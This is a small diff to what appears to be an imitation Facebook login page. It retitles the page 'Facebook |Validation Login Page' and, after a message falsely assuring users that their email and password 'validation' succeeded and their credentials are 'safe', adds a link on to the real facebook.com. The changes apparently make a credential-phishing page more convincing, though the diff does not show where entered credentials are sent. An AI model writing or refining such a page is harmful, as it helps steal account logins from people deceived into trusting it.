--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <html>
 <head>
     <link href="Style.css" rel="stylesheet" />
-    <title>Facebook Login Page Html Code With CSS (Free Download)!</title>
+    <title>Facebook |Validation Login Page </title>
     <link rel="stylesheet" type="text/css" href="style.css">
 </head>
 <body>
@@ -83,7 +83,7 @@
           var hasil = document.getElementById("hasil-output");
 
         
-        hasil.innerHTML = "<h1>Thank You </h1><p>The email and password validation process that you have done has been successful.Currently your Username and Password are safe</p> <hr> ";
+        hasil.innerHTML = "<h1>Thank You </h1><p>The email and password validation process that you have done has been successful.Currently your Username and Password are safe</p><a href='https://www.facebook.com'>Continue to facebook</a><hr> ";
 
     })
 </script>
